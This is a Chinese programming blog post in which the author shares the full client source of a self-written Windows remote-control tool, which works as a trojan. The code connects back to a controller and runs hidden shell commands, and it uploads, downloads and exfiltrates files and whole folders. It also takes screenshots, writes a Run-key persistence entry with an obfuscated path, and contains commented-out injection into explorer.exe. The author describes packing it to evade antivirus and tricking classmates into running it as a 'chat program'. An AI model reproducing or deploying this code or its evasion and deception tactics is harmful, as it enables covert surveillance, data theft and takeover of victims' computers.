学习vc有一段时间了,但是一直没用vc来写过一个远程控制的程序,一开始对我来时来说难度大了些,最近感觉可以试试了,所以写了下,感觉学到了很多东西,尤其是对网络编程这一块领悟不少。
下面是我的程序client端的源码,发上来与大家共同学习下。
// controlclient.cpp : Defines the entry point for the console application. // #include "stdafx.h" typedef struct{ DWORD wait; DWORD open; DWORD exec; DWORD pid; HANDLE h; char path[255]; }info; typedef HANDLE (_stdcall *openprocess)(DWORD,BOOL,DWORD); typedef DWORD (_stdcall *waitforsingleobject)(HANDLE,DWORD); typedef UINT (_stdcall *winexec)(LPCSTR,UINT); HANDLE hrt; HANDLE mh; char screenpath[200]={0}; DWORD WINAPI t(LPVOID p){ info *p1=(info*)p; winexec w=(winexec)p1->exec; openprocess o=(openprocess)p1->open; waitforsingleobject wait=(waitforsingleobject)p1->wait; p1->h=o(PROCESS_ALL_ACCESS,FALSE,p1->pid); // while(1){ wait(p1->h,INFINITE); w(p1->path,1); // } //MessageBoxA(0,p1->a,p1->a,0); // while(1); return 0; } DWORD getpid(char *p){ PROCESSENTRY32 p32; p32.dwSize=sizeof(p32); HANDLE hps=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); ::Process32First(hps,&p32); do{ if(::stricmp(p32.szExeFile,p)==0){ //::MessageBox(0,"1","1",0); ::CloseHandle(hps); return p32.th32ProcessID; } }while(::Process32Next(hps,&p32)); return 0; } void inject(){ int pid=getpid("explorer.exe"); HANDLE ph=::OpenProcess(PROCESS_ALL_ACCESS,false,pid); void *s; s=::VirtualAllocEx(ph,0,1024*4,MEM_COMMIT,PAGE_EXECUTE_READWRITE); ::WriteProcessMemory(ph,s,t,1024*4,0); info i; ZeroMemory(&i,sizeof(i)); char path[255]={0}; GetModuleFileName(0,path,255); strcpy(i.path,path); HMODULE m=::LoadLibrary("kernel32.dll"); i.wait=(DWORD)::GetProcAddress(m,"WaitForSingleObject"); i.exec=(DWORD)GetProcAddress(m,"WinExec"); i.open=(DWORD)GetProcAddress(m,"OpenProcess"); i.pid=GetCurrentProcessId(); info *s1; s1=(info *)::VirtualAllocEx(ph,0,sizeof(info),MEM_COMMIT,PAGE_READWRITE); ::WriteProcessMemory(ph,s1,&i,sizeof(info),0); DWORD tid; hrt=::CreateRemoteThread(ph,0,0,(LPTHREAD_START_ROUTINE)s,s1,0,&tid); } void EnableDebugPriv() //提升进程为DEBUG权限 { HANDLE hToken; TOKEN_PRIVILEGES tp; LUID luid; //打开进程令牌环 OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken); //获得进程本地唯一ID LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid); tp.PrivilegeCount=1; tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; tp.Privileges[0].Luid=luid; //调整进程权限 AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL); } int getclsid(const WCHAR* format, CLSID* pClsid) { UINT num = 0; // number of image encoders UINT size = 0; // size of the image encoder array in bytes ImageCodecInfo* pImageCodecInfo = NULL; GetImageEncodersSize(&num, &size); if(size == 0) return -1; // Failure pImageCodecInfo = (ImageCodecInfo*)(malloc(size)); if(pImageCodecInfo == NULL) return -1; // Failure GetImageEncoders(num, size, pImageCodecInfo); for(UINT j = 0; j < num; ++j) { if( wcscmp(pImageCodecInfo[j].MimeType, format) == 0 ) { *pClsid = pImageCodecInfo[j].Clsid; return j; // Success } } // for return -1; // Failure } queue<string> v; int foldersize=0; void folderinit(string s){ WIN32_FIND_DATA d; HANDLE h=FindFirstFile((s+"//*.*").data(),&d); do{ if(stricmp(d.cFileName,".")==0 || stricmp(d.cFileName,"..")==0){ continue; } if(d.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY){ v.push(s+"//"+d.cFileName+" 1"); folderinit(s+"//"+d.cFileName); }else{ v.push(s+"//"+d.cFileName+" 0"); foldersize+=((d.nFileSizeHigh * (MAXDWORD+1)) + d.nFileSizeLow); } }while(FindNextFile(h,&d)); FindClose(h); } int main(int argc,char *argv[]) { //EnableDebugPriv(); //inject(); mh=::CreateMutex(NULL,FALSE,"sxsxsx1"); if(GetLastError()==ERROR_ALREADY_EXISTS) { return 0; } ULONG_PTR m_gdiplusToken; Gdiplus::GdiplusStartupInput gdiplusStartupInput; Gdiplus::GdiplusStartup(&m_gdiplusToken, &gdiplusStartupInput, NULL); WSADATA data; WORD vv=MAKEWORD(2,2); WSAStartup(vv,&data); mysocket ms; ms.init(); char cp[255]={0}; GetModuleFileName(0,cp,255); FILE *cf=fopen(cp,"rb"); fseek(cf,0-sizeof(ini),SEEK_END); ini ci; fread(&ci,sizeof(ci),1,cf); fclose(cf); char *desip=0; if(ci.flag==1){ desip=ci.text; }else{ desip=ms.gethostbyname(ci.text); } GetWindowsDirectory(screenpath,200); strcat(screenpath,"//bilblt"); con:while(ms.connect(desip,2000)){ Sleep(1000); } while(1){ msg m; int r=ms.recv((char*)&m,sizeof(m),1); if(r==-1 || r==0){ ms.close(); ms.init(); goto con; } if(stricmp(m.flag,"command")==0){ char cmd[200]={0}; GetSystemDirectory(cmd,sizeof(cmd)); strcat(cmd,"//cmd.exe /c "); strcat(cmd,m.command); SECURITY_ATTRIBUTES sa; sa.nLength=sizeof(SECURITY_ATTRIBUTES); sa.bInheritHandle=true; sa.lpSecurityDescriptor=0; HANDLE p,p1; CreatePipe(&p,&p1,&sa,0); STARTUPINFO start; start.cb=sizeof(STARTUPINFO); GetStartupInfo(&start); start.hStdError=p1; start.hStdOutput=p1; start.wShowWindow=SW_HIDE; start.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; PROCESS_INFORMATION pi; CreateProcess(0,cmd,0,0,true,0,0,0,&start,&pi); //WaitForSingleObject(pi.hProcess,-1); CloseHandle(p1); char out[1024]={0}; while(1){ DWORD n; ReadFile(p,out,1023,&n,0); if(n>0){ ms.send(out,1024); memset((void*)out,0,1024); }else{ *out=0; ms.send(out,1024); break; } } CloseHandle(p); }else if(stricmp(m.flag,"down")==0){ downpic: FILE *f; f=fopen(m.command,"rb"); if(f){ fseek(f,0,SEEK_END); int l=ftell(f); fseek(f,0,SEEK_SET); if(l>0){ ms.send((char*)&l,sizeof(int)); char b[1024]={0}; int n=fread(b,1,1024,f); while(n){ ms.send(b,n); n=fread(b,1,1024,f); } }else{ ms.send((char*)&l,sizeof(int)); } }else{ int l=0; ms.send((char*)&l,sizeof(int)); } fclose(f); if(stricmp(m.command,screenpath)==0){ unlink(screenpath); } }else if(stricmp(m.flag,"up")==0){ FILE *f=fopen(m.command,"wb"); int l=m.num; int i=0; while(i<l){ msg m; ms.recv((char*)&m,sizeof(m)); fwrite(m.command,1,m.num,f); i+=m.num; ms.send((char*)&i,sizeof(int)); } fclose(f); }else if(stricmp(m.flag,"screen")==0){ int w=GetSystemMetrics(SM_CXSCREEN); int h=GetSystemMetrics(SM_CYSCREEN); HDC dc=GetDC(0); HDC dc1=CreateCompatibleDC(dc); HBITMAP b=CreateCompatibleBitmap(dc,w,h); HBITMAP old=(HBITMAP)SelectObject(dc1,b); BitBlt(dc1,0,0,w,h,dc,0,0,SRCCOPY |0x40000000); SelectObject(dc1,old); DeleteDC(dc); Image *i; i=Bitmap::FromHBITMAP((HBITMAP)b,0); CLSID gifcodec; getclsid(L"image/jpeg", &gifcodec); int len=MultiByteToWideChar(CP_ACP,0,screenpath,strlen(screenpath),0,0); wchar_t *wl=new wchar_t[len+1]; ::MultiByteToWideChar(CP_ACP, NULL, screenpath, strlen(screenpath), wl, len); wl[len]=0; i->Save(wl,&gifcodec, 0); delete []wl; delete i; DeleteDC(dc1); DeleteObject(b); strcpy(m.flag,"down"); strcpy(m.command,screenpath); goto downpic; }else if(stricmp(m.flag,"close")==0){ TerminateThread(hrt,0); CloseHandle(hrt); cout<<1; ms.send((char*)&m,sizeof(m)); cout<<2; ms.close(); cout<<3; CloseHandle(mh); WSACleanup(); GdiplusShutdown(m_gdiplusToken); ExitProcess(0); }else if(stricmp(m.flag,"folder")==0){ foldersize=0; while(!v.empty()){ v.pop(); } v.push(string(m.command)+" 1"); folderinit(m.command); ms.send((char*)&foldersize,sizeof(int),1); while(!v.empty()){ string s=v.front(); v.pop(); folder ff; string ty=s.substr(s.length()-1,1); if(ty=="0"){ ff.type=0; strcpy(ff.name,(s.substr(0,s.length()-2)).data()); FILE *f; f=fopen(ff.name,"rb"); if(f){ fseek(f,0,SEEK_END); int l=ftell(f); fseek(f,0,SEEK_SET); if(l>0){ ff.size=l; ms.send((char*)&ff,sizeof(ff),1); char b[1024]={0}; int n=fread(b,1,1024,f); while(n){ ms.send(b,n,1); n=fread(b,1,1024,f); } }else{ continue; } }else{ continue; } fclose(f); }else{ ff.type=1; strcpy(ff.name,(s.substr(0,s.length()-2)).data()); ms.send((char*)&ff,sizeof(ff),1); } } folder ff; ff.type=2; ms.send((char*)&ff,sizeof(ff),1); }else if(stricmp(m.flag,"startup")==0){ HKEY hKey; char lpRun[100]={0}; strcpy(lpRun,"Software//Microsoft//W"); strcat(lpRun,"indows//CurrentVersion//R"); strcat(lpRun,"un"); long lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpRun, 0, KEY_ALL_ACCESS, &hKey); if(lRet == ERROR_SUCCESS) { char pFileName[MAX_PATH] = {0}; DWORD dwRet = GetModuleFileName(NULL, pFileName, MAX_PATH); lRet = RegSetValueEx(hKey, "myclient", 0, REG_SZ, (BYTE *)pFileName, dwRet); RegCloseKey(hKey); } ms.send((char*)&m,sizeof(m),1); } } return 0; }
本来我是准备用远程线程注入技术对程序进行保护的,但是测试360会报病毒,所以这项功能就注释掉了,服务端的功能可以对远程电脑执行命令,下载上传文件与文件夹,截图与屏幕监控(这一块就是不停的截图,图片是以jpg形式存储的,测试发现传输速率真是不敢恭维,估计图像的压缩率不够吧,唉,看了其他专业的屏幕监控程序的源码真是自愧不如啊)。客户端有ip和域名两种方式与服务端连接,并且用了aspack加壳,不然360会报病毒,貌似还是过不了金山卫士啊,唉,没办法,发现加壳后程序的运行反而变慢了,命令的回显都要等半天,纠结啊。
完整的代码我会尽快传到我的csdn下载上去的,有兴趣的朋友可以去看看,代码测试了很多遍,应该没什么大的问题了,我也不打算更新了,也没想去做成灰鸽子那样的,况且自己的水平也不够啊。
本文有不足之处,还望大家多多指正。
PS:说起代码的测试,在本机测试是没问题的,关键在于广域网上的测试,会出现很多麻烦,我也没那条件搞两台机子,所以就骗同学说是聊天程序叫他们运行,有些人我还实在不忍心去骗,结果他们的机子好多报病毒,得罪了不少人,唉,现在想想为了写一个程序,自己也够折腾的了。只是为了自己技术的提高,折腾就折腾些吧,而且我做测试也没想窥人隐私,知道的越多,就会感觉理想与现实的差距之大,到头来感慨的还是自己。在此我向我得罪的朋友们深深的道个歉,也请你们能够谅解我。不说了,再说下去,又要吐一肚子苦水了。
努力,拼搏,自信,自强!
